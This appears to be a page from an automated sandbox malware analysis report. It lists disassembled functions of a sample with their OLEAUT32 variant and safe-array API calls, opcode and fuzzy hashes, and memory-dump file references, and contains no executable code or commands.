Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$BoundInit$DestroyElement
String ID:
API String ID: 214056513-0
Opcode ID: be337e4bb61264271955613fc8c3faaf5533405acd2411b9a88f65675956c437
Instruction ID: dd4a1dc2a654e4246b2ff6aa6b2152f182010d15cd5b91f5641ee990d3c0a0bc
Opcode Fuzzy Hash: be337e4bb61264271955613fc8c3faaf5533405acd2411b9a88f65675956c437
Instruction Fuzzy Hash: 48C159716087419FD700CFA8C888A5BBBE9FF99304F20895DF695CB260C775E945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FAF30 Relevance: 24.3, APIs: 16, Instructions: 335
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6C8FAF75
VariantInit.OLEAUT32(?), ref: 6C8FAF7C
VariantInit.OLEAUT32(?), ref: 6C8FAF83
VariantCopy.OLEAUT32(?,?), ref: 6C8FB00D
VariantClear.OLEAUT32(?), ref: 6C8FB027
SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 6C8FB19C
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 6C8FB1AA
SafeArrayAccessData.OLEAUT32(?,?), ref: 6C8FB1C5
_memmove.LIBCMT ref: 6C8FB1E6
SafeArrayUnaccessData.OLEAUT32(?), ref: 6C8FB1EF
VariantClear.OLEAUT32(?), ref: 6C8FB237
VariantClear.OLEAUT32(?), ref: 6C8FB23E
VariantClear.OLEAUT32(?), ref: 6C8FB245
VariantClear.OLEAUT32(?), ref: 6C8FB29D
VariantClear.OLEAUT32(?), ref: 6C8FB2A4
VariantClear.OLEAUT32(?), ref: 6C8FB2AB

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$BoundData$AccessCopyUnaccess_memmove
String ID:
API String ID: 3403836469-0
Opcode ID: db4eebafcbb2cc685a993f26de0e6f7bddb9dc8a7ce3fc21d0b0366588b29557
Instruction ID: 95f4c702ee1816aa067f526e9c38df00f4a2f48751e485ba0238a3ca8a438993
Opcode Fuzzy Hash: db4eebafcbb2cc685a993f26de0e6f7bddb9dc8a7ce3fc21d0b0366588b29557
Instruction Fuzzy Hash: CCC1BCB16083419FD710DFA8C98096BB7E9FF99344F10892DF669CB650D730E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C90D410 Relevance: 24.3, APIs: 16, Instructions: 290
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6C90D4B3
VariantInit.OLEAUT32 ref: 6C90D4C5
VariantInit.OLEAUT32(?), ref: 6C90D4CC
_malloc.LIBCMT ref: 6C90D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C90D58B
SafeArrayCreateVector.OLEAUT32 ref: 6C90D5A6
SafeArrayAccessData.OLEAUT32 ref: 6C90D5B8

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArrayInitSafeVariant$CreateVector$AccessData_malloc
String ID:
API String ID: 1552365394-0
Opcode ID: 7bc18c6b0d4c189a5dc9fa72582a0e99e22b55b06754d2376f7e7d1cea9f062d
Instruction ID: 54111a241d544ac448ae4dbc505570578119700892cc2454a143dec4f56ba1b2
Opcode Fuzzy Hash: 7bc18c6b0d4c189a5dc9fa72582a0e99e22b55b06754d2376f7e7d1cea9f062d
Instruction Fuzzy Hash: 8BB167B66083009FD314CF68C880A5BB7F9FF99718F14895DE8958B790E730E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C90D468 Relevance: 21.2, APIs: 14, Instructions: 226
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6C90D4B3
VariantInit.OLEAUT32 ref: 6C90D4C5
VariantInit.OLEAUT32(?), ref: 6C90D4CC
_malloc.LIBCMT ref: 6C90D551
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C90D58B
SafeArrayCreateVector.OLEAUT32 ref: 6C90D5A6
SafeArrayAccessData.OLEAUT32 ref: 6C90D5B8
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90D601
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90D63E

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$InitVariant$CreateElementVector$AccessData_malloc
String ID:
API String ID: 2723946344-0
Opcode ID: ed310e1eeed05dcef83afc24b76d640843b9c98a8cc0e2ce53192fbea870a892
Instruction ID: 3db12dbd9be64f8dfce5a5b41a79671e77e9960aaa202c856270f137a456ba34
Opcode Fuzzy Hash: ed310e1eeed05dcef83afc24b76d640843b9c98a8cc0e2ce53192fbea870a892
Instruction Fuzzy Hash: CD9155B62083019FD314CF68C880A6BBBF9BF99308F15895DE9958B391D730E945CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6C905140 Relevance: 21.2, APIs: 14, Instructions: 203
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6C905177

Part of subcall function 6C912820: _malloc.LIBCMT ref: 6C912871

SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000004), ref: 6C9051B9
SafeArrayCreateVector.OLEAUT32(00000011,00000000,00000000), ref: 6C9051D5
SafeArrayAccessData.OLEAUT32(00000000,00000000), ref: 6C9051E5
_memmove.LIBCMT ref: 6C9051FF
SafeArrayUnaccessData.OLEAUT32(00000000), ref: 6C905208
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C90522C
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6C905263
VariantClear.OLEAUT32(?), ref: 6C90526C
SafeArrayPutElement.OLEAUT32(00000000,00000002,?), ref: 6C9052AD
VariantClear.OLEAUT32(?), ref: 6C9052B6
SafeArrayPutElement.OLEAUT32(00000000,00000002,00000002), ref: 6C9052D2
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C90534E
VariantClear.OLEAUT32(?), ref: 6C905358

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$ElementVariant$Clear$CreateDataVector$AccessDestroyInitUnaccess_malloc_memmove
String ID:
API String ID: 452649785-0
Opcode ID: 7b103195c5fa8a4fb71e6e0b31de47adf26a7a1517b0aaea3ee7abbef4e92b15
Instruction ID: ddd8fa47b5373072221e18361746b7c1af78d19e384cf7fe4b95599de1c63c38
Opcode Fuzzy Hash: 7b103195c5fa8a4fb71e6e0b31de47adf26a7a1517b0aaea3ee7abbef4e92b15
Instruction Fuzzy Hash: 35711AB1A0121AEBDB00DFA5C984BAFBBB8FF59304F10811DE915DB640D774EA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 6C9044C0 Relevance: 19.8, APIs: 13, Instructions: 261
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6C9044FF
VariantInit.OLEAUT32(?), ref: 6C904505
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C904516
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C904551
VariantClear.OLEAUT32(?), ref: 6C90455A
SafeArrayCreateVector.OLEAUT32(0000000D,00000000,00000002), ref: 6C904579
SafeArrayPutElement.OLEAUT32(00000000,00000000,?), ref: 6C904594
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6C9045B5
SafeArrayPutElement.OLEAUT32(?,00000000,?), ref: 6C9045CE
std::tr1::_Xweak.LIBCPMT ref: 6C90475A
SafeArrayDestroy.OLEAUT32(?), ref: 6C904777
VariantClear.OLEAUT32(?), ref: 6C904787
VariantClear.OLEAUT32(?), ref: 6C90478D

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$DestroyXweakstd::tr1::_
String ID:
API String ID: 1304965753-0
Opcode ID: 34014757f6d33959f1eff612a6a425cadf33423261cb1cae16bb630e61c44f1a
Instruction ID: 87e228823915e5d4f9d38be7529c54008781d22a4c895e95986ece5d6bbe8fef
Opcode Fuzzy Hash: 34014757f6d33959f1eff612a6a425cadf33423261cb1cae16bb630e61c44f1a
Instruction Fuzzy Hash: 02A13C75A0120A9BDB14DBA5C984EAFB7B9FF9D710F14462DE506EBB80C630E941CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6C90BF00 Relevance: 18.2, APIs: 12, Instructions: 215
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6C90BF3D
VariantInit.OLEAUT32(?), ref: 6C90BF4A
VariantInit.OLEAUT32(?), ref: 6C90BF50
VariantInit.OLEAUT32(?), ref: 6C90BF56
VariantInit.OLEAUT32 ref: 6C90C04D
VariantCopy.OLEAUT32(?,?), ref: 6C90C054
VariantInit.OLEAUT32 ref: 6C90C085
VariantCopy.OLEAUT32(?,?), ref: 6C90C08C
VariantClear.OLEAUT32(?), ref: 6C90C118
VariantClear.OLEAUT32(?), ref: 6C90C11E
VariantClear.OLEAUT32(?), ref: 6C90C124
VariantClear.OLEAUT32(?), ref: 6C90C12A

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Init$Clear$Copy
String ID:
API String ID: 3833040332-0
Opcode ID: a34616e57cffa02928158f94be77bc1f5a0a2d750011765bce12ac842a4afd80
Instruction ID: dc70315058c29e65275447142d6bf16ef71767290c79a33e0b400bd2b8473ebf
Opcode Fuzzy Hash: a34616e57cffa02928158f94be77bc1f5a0a2d750011765bce12ac842a4afd80
Instruction Fuzzy Hash: E0817A71A01219EFDF04EFA8C880AEEBBB9BF49304F14455DE505A7740DB34EA05CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6C9064D0 Relevance: 18.2, APIs: 12, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6C90650C
VariantInit.OLEAUT32(?), ref: 6C906519
VariantInit.OLEAUT32(?), ref: 6C906520
SafeArrayCreateVector.OLEAUT32(0000000C), ref: 6C906531
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90656D
VariantClear.OLEAUT32(?), ref: 6C906576
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C9065B6
VariantClear.OLEAUT32(?), ref: 6C9065BF
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C906666
VariantClear.OLEAUT32(?), ref: 6C906677
VariantClear.OLEAUT32(?), ref: 6C90667E
VariantClear.OLEAUT32(?), ref: 6C906685

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArraySafe$Init$Element$CreateDestroyVector
String ID:
API String ID: 1625659656-0
Opcode ID: ef0a674c0b03a2a2aff17d0e21fb10a191154f25feb72b8ae573ff7bde961cbc
Instruction ID: 96184b9b730bb0ba654ad2e44ec07799e37b91edd3a8a1a9fb6837601df372f9
Opcode Fuzzy Hash: ef0a674c0b03a2a2aff17d0e21fb10a191154f25feb72b8ae573ff7bde961cbc
Instruction Fuzzy Hash: 7D5107722083059FD700DF65C880A5BBBF8AFDA714F108A1DF95597250DB75E905CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6C90CB90 Relevance: 18.1, APIs: 12, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6C90CBCA
VariantInit.OLEAUT32(?), ref: 6C90CBD3
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C90CBE4
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C90CBF6
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90CC0D
SafeArrayPutElement.OLEAUT32(?,?,?), ref: 6C90CC39
VariantClear.OLEAUT32(?), ref: 6C90CC42
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6C90CC5D
SafeArrayPutElement.OLEAUT32(00000000,00000001,?), ref: 6C90CC77
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C90CCEC
VariantClear.OLEAUT32(?), ref: 6C90CCFC
VariantClear.OLEAUT32(?), ref: 6C90CD02

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: ArraySafe$Variant$Element$Clear$CreateInitVector$Destroy
String ID:
API String ID: 3548156019-0
Opcode ID: e56f6e11880e9fdc99bc9cdfa7644d0cfcf76b557214a02a8f98cb1bd4a3abf9
Instruction ID: cde35cc2a680345c8822498496b20284bf2aa3631f6b94666765eaa4741b46ca
Opcode Fuzzy Hash: e56f6e11880e9fdc99bc9cdfa7644d0cfcf76b557214a02a8f98cb1bd4a3abf9
Instruction Fuzzy Hash: AB515DB5E00219DFDB00DFA8C880EEEBBB8EF59714F10855EEA15A7240D770A905CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C8FA350 Relevance: 16.7, APIs: 11, Instructions: 206
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 6C8FA393
VariantInit.OLEAUT32(?), ref: 6C8FA39A
VariantInit.OLEAUT32(?), ref: 6C8FA3A1
VariantCopy.OLEAUT32(?,?), ref: 6C8FA3EF
VariantClear.OLEAUT32(?), ref: 6C8FA409
VariantClear.OLEAUT32(?), ref: 6C8FA50A
VariantClear.OLEAUT32(?), ref: 6C8FA511
VariantClear.OLEAUT32(?), ref: 6C8FA518
VariantClear.OLEAUT32(?), ref: 6C8FA55E
VariantClear.OLEAUT32(?), ref: 6C8FA565
VariantClear.OLEAUT32(?), ref: 6C8FA56C

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$Init$Copy
String ID:
API String ID: 3214764494-0
Opcode ID: 75e57da5df4fc164cacc4170c45ace78ed50fce9b2f045a2914b3a82d4298fc3
Instruction ID: 4e75810f6f70af57c586ccdad4c3cf01a6e1d370882b5bd4c7a74d28d487c402
Opcode Fuzzy Hash: 75e57da5df4fc164cacc4170c45ace78ed50fce9b2f045a2914b3a82d4298fc3
Instruction Fuzzy Hash: 7B715A722083419FD310DF69C980A9BB7E8FF99754F108A5DFA95CB690D730E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 6C9049B0 Relevance: 15.2, APIs: 10, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(6C9605A8), ref: 6C9049EE
VariantInit.OLEAUT32(?), ref: 6C9049F7
VariantInit.OLEAUT32(?), ref: 6C9049FD
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6C904A08
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C904A39
VariantClear.OLEAUT32(?), ref: 6C904A45
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C904B66
VariantClear.OLEAUT32(?), ref: 6C904B76
VariantClear.OLEAUT32(?), ref: 6C904B7C
VariantClear.OLEAUT32(6C9605A8), ref: 6C904B82

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$Clear$ArrayInitSafe$CreateDestroyElementVector
String ID:
API String ID: 2515392200-0
Opcode ID: 9d409c45efa1d2ce5feca79189ec3f977cc95740d1ce3d91cca776e27496dbda
Instruction ID: 5ff0df4322b8f2ec0de8501266c927ba8120ffbb845e358351ff09cdec5bf7a2
Opcode Fuzzy Hash: 9d409c45efa1d2ce5feca79189ec3f977cc95740d1ce3d91cca776e27496dbda
Instruction Fuzzy Hash: 2C514C72A00219AFDB04DFA5CC84EAEB7B8FF99314F14416DE915EB644D734EA01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6C9066A0 Relevance: 15.2, APIs: 10, Instructions: 155
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32 ref: 6C9066DB
VariantInit.OLEAUT32 ref: 6C9066EA
SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000002), ref: 6C906700
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C90673A
VariantClear.OLEAUT32(?), ref: 6C906747
SafeArrayPutElement.OLEAUT32(00000000,?,?), ref: 6C906787
VariantClear.OLEAUT32(?), ref: 6C906794
SafeArrayDestroy.OLEAUT32(00000000), ref: 6C906849
VariantClear.OLEAUT32(?), ref: 6C90685A
VariantClear.OLEAUT32(?), ref: 6C906861

Memory Dump Source

Source File: 00000000.00000002.1384971621.000000006C8E1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C8E0000, based on PE: true

Associated: 00000000.00000002.1384909940.000000006C8E0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385630538.000000006C964000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385787961.000000006C97E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385822311.000000006C980000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385918382.000000006C981000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1385966714.000000006C983000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98A000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386079703.000000006C98C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.1386217873.000000006C98E000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c8e0000_TT4ybwWc1T.jbxd

Similarity

API ID: Variant$ArrayClearSafe$ElementInit$CreateDestroyVector
String ID:
API String ID: 551789342-0
Opcode ID: ae541e4aabfd329dd60cd52b8b71783c099c6a88655d196fd4c23da2103af792
Instruction ID: 3348c142e2ed9278e6cd85c0c23ac735b982f016cd7530665f984d60cc4129d6
Opcode Fuzzy Hash: ae541e4aabfd329dd60cd52b8b71783c099c6a88655d196fd4c23da2103af792
Instruction Fuzzy Hash: 19517672209206AFD700CF64C944B9BBBF9FF99714F118A5DF9449B290D730EA05CBA2

Uniqueness

Uniqueness Score: -1.00%

